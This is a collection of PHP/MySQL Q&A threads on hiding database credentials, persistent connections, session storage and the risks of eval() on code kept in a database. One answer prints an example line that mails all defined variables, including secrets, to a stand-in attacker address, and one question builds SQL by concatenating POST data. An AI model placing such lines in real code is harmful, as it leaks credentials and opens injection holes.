Database security from my client - php

I am about to deliver a PHP application to my client, but I don't want to share the database credentials with him. I want the database to be accessible only via my application and by no other means.
However, if I hand over the PHP code, they can read the database credentials in the database connection script and access the database from outside the application.
How can I possibly stop them from obtaining the database username and password, given that there is no "compiled" code?
EDIT: The application and database are on two different servers: the app runs on the client's server and uses a remote database connection; the database is on my own server.

I don't want to share the database credentials with him.
If they have access to the client connecting to the DB, you have to. Otherwise, by definition, credentialed access would be impossible.
However you obfuscate the connection phase, once the connection is established anyone with access to the source code may hijack it however s/he desires. I don't think that even encrypting the whole modeling class would be enough.
This is particularly evident using the deprecated MySQL functions: once a connection is established, any other part of the code may issue a query and have it executed in the context of the connection, with no longer any need to know the credentials. But unless you do things very carefully (and, I suspect, depending on the attacker's ability, even if you do), the same will hold true with mysqli, PDO, and so on.
What you can do is:
limit privileges on the database to the barest possible minimum. This should always be done, BTW, because you never know what vulnerabilities might be in some code, yours or somebody else's that's connected to yours (libraries, plugins, ...), and who could thence gain access to the application.
limit connection IP to that of the client. Another thing you should always do whenever practical: there's no reason not to.
move whatever is possible to move into stored procedures and functions.
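As a sketch of the stored-procedure approach (the host, credentials, and the get_user procedure below are hypothetical, not from the question), the application account can be granted only the EXECUTE privilege, so even someone who reads the credentials can only call the procedures you defined:

```php
<?php
// Hypothetical: the app account was granted only EXECUTE on this schema,
// e.g.  GRANT EXECUTE ON appdb.* TO 'app'@'client-ip';
$pdo = new PDO('mysql:host=db.example.com;dbname=appdb', 'app', 'secret', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);

// Call a stored procedure instead of issuing raw SQL; the underlying
// table need not be readable by the 'app' account at all.
$stmt = $pdo->prepare('CALL get_user(?)');
$stmt->execute([1]);
$user = $stmt->fetch(PDO::FETCH_ASSOC);
```

With this setup, even ad-hoc queries typed in by someone holding the credentials fail with a privilege error; only the procedure interface is exposed.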
If you want (and really need) even more control, you need more work:
instead of using prepared statements built on the client (note that you will now have to use "static" statements: you won't be able to prepare, say, SELECT {$field} FROM table WHERE id = ? and bind it to id), move the statements themselves to a thin layer on the database server, passing parameters via (e.g.) JSON.
So what was, say,
SQLExec("SELECT * FROM users WHERE userid = ?", "1")
can become very easily
HTTPExec("SELECT * FROM users WHERE userid = ?", 1);
but now, on the server (you'll need a HTTP server there), a script will verify that the requested query is indeed among the approved queries; and only if so, execute it and return the results. Depending on several factors, you might even be able to pass this as a "performance improvement". On the other hand, the "database" server is now more loaded.
Now the client cannot issue a "DROP TABLE Students;" statement, because this statement is not among the approved statement list.
To generate the approved statement list, you can instruct the server to approve everything and store the queries it receives. You then do an exhaustive review of the whole web app in order to trigger every query at least once (you probably have an integration test script that already does this and verifies the results are OK). When you've finished, all the queries just received, and only those, will be considered "valid".
Someone changes a comma in one of the queries in the client code -- and the server will reject the query as unauthorized.
This is in the end equivalent to moving (or duplicating) the relevant application code onto your server, so there might be issues: in effect, you're no longer giving your client the full application.
(At that point you could even replace all the queries in the client code with their, say, MD5 hash. The server does not really execute the SQL sent by the client anyway, it executes the good copy that's present server side for comparison purposes. So sending the query or its MD5 signature is perfectly equivalent).
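A minimal sketch of that server-side gatekeeper (the function and variable names here are mine, purely illustrative): the server keeps the good copy of each approved query keyed by its MD5 hash, and resolves whatever the client sends, full SQL text or just the hash, to that copy or to a refusal.

```php
<?php
// Approved-statement list built during the review phase: the server
// stores the authoritative SQL text keyed by its MD5 hash.
$approved = [
    md5('SELECT * FROM users WHERE userid = ?') => 'SELECT * FROM users WHERE userid = ?',
];

// The client may send either the SQL text or its 32-char MD5 hash; both
// resolve to the same server-side copy. Anything else is rejected (null).
function resolve_query(string $sqlOrHash, array $approved): ?string {
    $hash = (strlen($sqlOrHash) === 32 && ctype_xdigit($sqlOrHash))
        ? $sqlOrHash
        : md5($sqlOrHash);
    return $approved[$hash] ?? null;   // null => reject as unauthorized
}

var_dump(resolve_query('SELECT * FROM users WHERE userid = ?', $approved));
var_dump(resolve_query('DROP TABLE Students;', $approved)); // NULL: rejected
```

Note that the server never executes the text the client sent; it executes its own stored copy, which is why sending the query or its hash is equivalent.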

You could encode the config file that stores the database connection information with ionCube. You can upload single files for free.
http://www.ioncube.com/online_encoder.php


Minimizing MYSQL connection from webhook callback

I am working on a project that requires my server xyz.com to receive POST/GET responses to xyz.com/callback.php from abc.com (an SMS gateway provider).
Below is how I currently handle the responses on callback.php:
1. Receive the POST data from abc.com (this POST contains a unique ID)
2. Connect to the MySQL database and UPDATE users WHERE messageId=Same_ID_from_POST_data
This works and the data is being updated. However, it is causing CPU overload due to the thousands of MySQL connections: whenever there is a delivery receipt from the API server for an individual message, callback.php connects to MySQL and updates the database.
Is there a best practice to minimize the number of times I connect to MySQL?
I was thinking of doing the following; I doubt, however, that it makes any sense.
1. Receive the POST data from the API server as before.
2. Instead of updating MySQL, simply append to a .txt file with the following code:
$query .= "UPDATE users SET status='$post_data_for_status' WHERE unique='$post_unique';";
Then, after about 10 minutes, a cron job runs a PHP file that uses mysqli_multi_query($connection, $query) to run the accumulated updates over a single connection. After the update I simply unlink the .txt file.
Even if the above method would work, I don't know how to do it, and I am sure there is a better alternative.
Any ideas please, and sorry for the long epistle.
What you are looking for sounds like avoiding connection churning, which is one of the benefits we get from using a "connection pool", commonly used in Java/J2EE web applications.
PHP doesn't provide connection pooling (AFAIK). But PDO and mysqli do provide for "persistent" connections, which give some of the same benefit as connection pool (avoiding connection churning.)
For mysqli, prepend "p:" to the hostname in the mysqli_connect.
http://php.net/manual/en/mysqli.persistconns.php
For PDO, include PDO::ATTR_PERSISTENT => true in the connection.
http://php.net/manual/en/pdo.connections.php
Be aware that with persistent connections, the MySQL connection maintains its state (session variables, temporary tables, user-defined variables, et al.). For example, if a client issues a statement such as SET time_zone = '+00:00'; or SET @foo = 'bar';, a subsequent client reusing that MySQL connection is going to inherit the time_zone setting or the user-defined variable @foo value; in short, whatever changes to the MySQL session state the previous clients made.
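For illustration, the two styles of persistent connection look like this (hostname, credentials, and database name are placeholders):

```php
<?php
// mysqli: prefix the host with "p:" to request a persistent connection.
$mysqli = new mysqli('p:db.example.com', 'user', 'pass', 'mydb');

// PDO: pass PDO::ATTR_PERSISTENT => true in the driver options array.
$pdo = new PDO('mysql:host=db.example.com;dbname=mydb', 'user', 'pass', [
    PDO::ATTR_PERSISTENT => true,
]);
```

Because of the session-state caveat above, it's safest to reset anything you change (time zone, user-defined variables) at the start of each request rather than assuming a fresh connection.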

MySQL Variables PHP Connections

I'm using a PHP web application to connect to MySQL. What I would like to do is set the user ID of the client who has logged in, and then use that MySQL variable within views and functions to limit the data returned.
Currently, I'm simply using:-
SET @UserID = 3;
And then referencing this within views/functions.
Is this a suitable and reliable method to use across multiple concurrent user sessions? Will the variable be present for the lifetime of that user's MySQL connection (or page load) from PHP? I obviously want to ensure no other connections can leverage it. It's set on every page load (or MySQL reconnection from my app).
Thanks all!
As it clearly states in the first paragraph of the mysql variables man page: http://dev.mysql.com/doc/refman/5.0/en/user-variables.html
User-defined variables are session-specific. That is, a user variable defined by one client cannot be seen or used by other clients. All variables for a given client session are automatically freed when that client exits.
i.e., they exist while the PHP<->MySQL connection is kept alive, per connection, and are automatically removed when the connection is closed/terminated. Unless you're using persistent connections in PHP (which you shouldn't be anyway), the MySQL variables basically exist for the life of that particular script invocation, and will NOT be available when the same user comes back with another HTTP request later.
So, strictly speaking, what you're doing shouldn't be a problem (each PHP connection exists more-or-less independently). But, that said, it isn't the best approach.
I think you've got a "if all you have is a hammer, everything looks like a nail" problem. MySQL is not designed with the request lifecycle in mind, and it shouldn't need to be aware of it. PHP, on the other hand, is designed with exactly that idea.
Instead of:
mysqli_query($conn, 'SET @UserID = ' . $id);
$output = mysqli_query($conn, 'SELECT * FROM FOO WHERE ID = @UserID');
Why not just use bound variables?
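That is, something along these lines ($conn is an existing mysqli connection; the table and column names are taken from the snippet above):

```php
<?php
// Prepared statement with a bound parameter: no session variable needed,
// and the value is safely handled by the driver.
$stmt = mysqli_prepare($conn, 'SELECT * FROM FOO WHERE ID = ?');
mysqli_stmt_bind_param($stmt, 'i', $id);   // 'i' = integer parameter
mysqli_stmt_execute($stmt);
$output = mysqli_stmt_get_result($stmt);

while ($row = mysqli_fetch_assoc($output)) {
    // ... use $row ...
}
```

This keeps the per-user value scoped to the PHP request itself instead of relying on MySQL session state.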

using mysql to track sessions instead of trusting the server?

Some context...skip to the bottom for question if you are impatient...
I am trying to limit access to four pages on my (future) website to users with a valid username and password pair. To this end, I have a simple PHP/HTML form in which the client types a username and password and hits 'submit'...the data goes via POST and another PHP script validates the username/password pair using a SELECT against my MySQL database...
userpassword table:
uid (PRIMARY KEY,INT), username (varchar 32), password (char 128)
If the match works then it looks up the access table to see what page that particular username has access to (1 for access, 0 for no access):
useraccess table:
uid (PRIMARY KEY,INT), securepage0(TINYINT), securepage1(TINYINT)...
The PHP script then prints out links to the secure pages they have access to. If I understand them correctly, the articles and books I have read state that you normally store a cookie on the client side with a session ID that points to a session file on server that stores the username/password pair and whatever other session variables until it either times out or the user logs out.
I don't want to spend the money for a dedicated server. So all that PHP session info is saved all lumped together on the server, along with the other half dozen websites from other customers running on it. This strikes me as horribly insecure...
The question is...would it be any more secure to circumvent all that and store/track the per-user session information in my own mySQL table? ie. something like this:
session table:
sessionkey (PRIMARYKEY, CHAR(128)), uid(INT), expiretimedate(DATETIME), accesstosecurepage0 (TINYINT), accesstosecurepage1(TINYINT)...
So when a user hits any "secure" page it would check their session id cookie (if present) and then do a SELECT on the session table to see if that particular "sessionkey" is present, then give them access depending on what accesstosecurepage0,1,2,etc. are set to.
Would this work better than the alternative or am I wasting my time?
This question is about as old as sessions themselves, although possibly for slightly different reasons than yours. Security is not the issue, as session hijacking occurs when someone gets hold of a user's session ID and sends that to the server. Therefore, using a database to store session data is as insecure as using a file on the machine - it essentially amounts to the same thing.
Database sessions tend to be used when multiple servers are required to host one site, or sessions need to be stored across different but related domains. However, it is considerably more work to set this up from scratch, if not using a pre-built framework.
If you don't need this functionality then using the standard session should be adequate.
I don't see this making your application any more secure. Session hijacking occurs when someone retrieves another user's session ID and pretends to be them. Your session table would not prevent this from happening. (I skipped to the bottom btw, hope I didn't miss any important details:)
It might even make it less secure, since you are now giving hijackers two ways to steal session data: one through the file system and one through the DB. As to which one is more secure over the other, I'm not too sure, but I would think it depends on how well you secure either one yourself.
Potentially more secure, yes -- after all, shared hosting is an infamous target for exactly the kind of security breaches you fear but, once again, the MySQL server is shared and accessible by other users just like all other resources so, worst case scenario, the damage is exactly the same.
The efficiency hit, however, would probably be unbearable and would almost certainly mitigate the extra peace of mind. To avoid the use of sessions or similar mechanisms completely, you wouldn't even have an easy way to cache the db results and a query per page load, per person - an unnecessary query - may well prove unacceptable.
Not to mention, you're replacing one class of vulnerability with a whole new one in the form of SQL injection.
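If you do go the database route, at minimum perform the lookup with a prepared statement, so the session key coming from the untrusted cookie cannot be used for SQL injection. A sketch, using the column names from the question (the PDO connection setup is assumed):

```php
<?php
// $pdo is an existing PDO connection; the cookie value is untrusted input.
$stmt = $pdo->prepare(
    'SELECT uid, accesstosecurepage0, accesstosecurepage1
       FROM session
      WHERE sessionkey = ? AND expiretimedate > NOW()'
);
$stmt->execute([$_COOKIE['sessionkey'] ?? '']);
$session = $stmt->fetch(PDO::FETCH_ASSOC);

// No row, or no flag for this page: deny access.
if ($session === false || !$session['accesstosecurepage0']) {
    http_response_code(403);
    exit('Access denied');
}
```

The same pattern applies to the login SELECT itself; any value that originates from the browser should only ever reach the database as a bound parameter.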

Is storing PHP code in a database, and eval()ing it at runtime, insecure?

I've built a program that stores, retrieves, and eval()s code from a SQLite database.
Before I get jumped for my bad coding practices, let's just treat this as a theoretical and pretend that I have a good reason for doing so.
All other considerations aside, and assuming that user input is not a factor, is there a security risk inherent in storing PHP code in a DB and running it with eval()?
Clarifications:
I am not eval()ing user-submitted content.
The SQLite DB file is in the same directory, and has the same security applied to it, as the rest of my files.
Please no comments on performance, caching, etc. I'm aware of all that.
eval() in itself is not insecure. It's just bad practice, unclear, and it opens the door to a whole bunch of bugs and security-related issues.
Even if user-submitted data isn't being stored in your database, you're still providing a way to have code stored in the database be executed even if you didn't put that code there. If someone were to gain access to your database server, they could potentially do worse things than drop your database by modifying the code it stores, like deleting any files that the PHP script has write access to.
Yes. If I can inject something into your database then I could possibly execute it on your server through the eval.
Are you trying to use the database as a hashtable of functions, so you can call a piece of code depending on some key lookup? The security problem I see here is that the database may have some other API exposed somewhere to populate it. Without you knowing or explicitly doing it, some key/value pair could be introduced into the database. If you used a hashtable of functions in code instead, someone would need to make a commit to your code repository to change a function. So now you need to protect the DB as well as you protect your code repository.
You're letting the database run any PHP code it wants as whatever user the PHP is running as. Of course this is insecure.
eval() is not inherently insecure. But it's secure only as far as the code it evaluates is safe. So we could come up with an example of code that does something bad, suppose that there's some way that code got stored in your database, and boom.
Code that is stored elsewhere is not part of your project, not code-reviewed, not tracked in git, and not unit-tested. The code is basically not evaluated from a security perspective, so there's no assurance of security. In other words, from a Quality Assurance perspective, it's a weak quality plan, since code security is part of code quality.
Anyone with access to your database can modify code, and then that code is executed, I assume without any review. The code has no access restrictions; it can reference and even modify variables within the application that calls it. So the question is how is the code in your database changed? Who has access? What is the code review process? What is the testing process?
In addition to SQL injection that could change the PHP code in the database illicitly, there's also the security of whatever authentication you use for users before they can make authorized changes to the code. I'm supposing your app has some interface for changing code in the database through a web interface.
You asked for evidence, by which I guess you want an example of code that could do something bad if it were evaluated.
If I can arrange for something like the following code to be stored in your database, and eval() that code, I can get a lot of information about your application. E.g. your database password, your authentication methods, the version of the framework you use... all sorts of things.
mail('attacker@example.com', 'Mwa ha ha', print_r(get_defined_vars(), true));
There are similar functions like get_defined_functions() too. Or the code could even return its own source with file_get_contents(__FILE__). An attacker can quickly learn where there are other exploitable security holes in your code.
And then there are various ways PHP code can get information about your server, or make changes to your server. Combine eval() with code that uses exec() and you can run any command on the server. At least it's running under the uid the http server runs as -- which I hope is not root.

keeping db connection active across pages

I'm a learner. Is there a way to stay connected to the MySQL database as the user is taken to the next page?
For example, the db connection is made, the user is logged in, and then goes to the next page to access a table in the database. Instead of having to make the db connection again, is there a way to keep the previous connection active?
Or does it matter at all in a low-traffic site?
I read a post yesterday about something related to sessions, and the responder talked about sending a "header-type" (?) file.
Thank you.
Yes and no. Once the user goes to the next page, for all intents and purposes they are not connected to the database anymore.
Your script (on the next page) will still need to open the connection for them. mysql_pconnect() will ensure the actual connection they used is still available when they want it next, however, it can also cause excess number of apache/mysql connections to wait around uselessly.
I'd strongly suggest not using it unless your benchmarks show that it provides a significant gain in performance. Typically, for most applications (especially when you're learning), I would not bother with persistent connections. Note the warning in the PHP Manual
It won't matter unless you're getting a ton of requests, but PHP has mysql_pconnect() for persistent connections to MySQL. Each instance of Apache will keep around an active connection to MySQL that can be used without reconnecting.
I believe you're looking for something like mysql_pconnect(), which establishes a persistent connection to the database.
I can't quite understand your question. If you have fetched data from the DB, you usually do some stuff with it. And if you want to fetch data from the DB, you usually follow the steps below.
Some frameworks and libraries make these steps a bit easier.
Here is the usual flow of the process:
1. Make a connection to the DB.
2. Select a database.
3. Send a query to the DB.
4. Fetch the results.
5. Do some fun stuff with the data.
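Those steps map onto mysqli roughly like this (host, credentials, database, and table are placeholders):

```php
<?php
// 1-2. Connect and select a database in a single call.
$conn = mysqli_connect('localhost', 'user', 'pass', 'mydb');

// 3. Send a query to the DB.
$result = mysqli_query($conn, 'SELECT id, name FROM users');

// 4. Fetch the results row by row.
while ($row = mysqli_fetch_assoc($result)) {
    // 5. Do some fun stuff with the data.
    echo $row['id'], ': ', $row['name'], "\n";
}

mysqli_close($conn);
```

Each HTTP request repeats these steps; as the answers above note, that reconnection cost is normally negligible on a low-traffic site.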
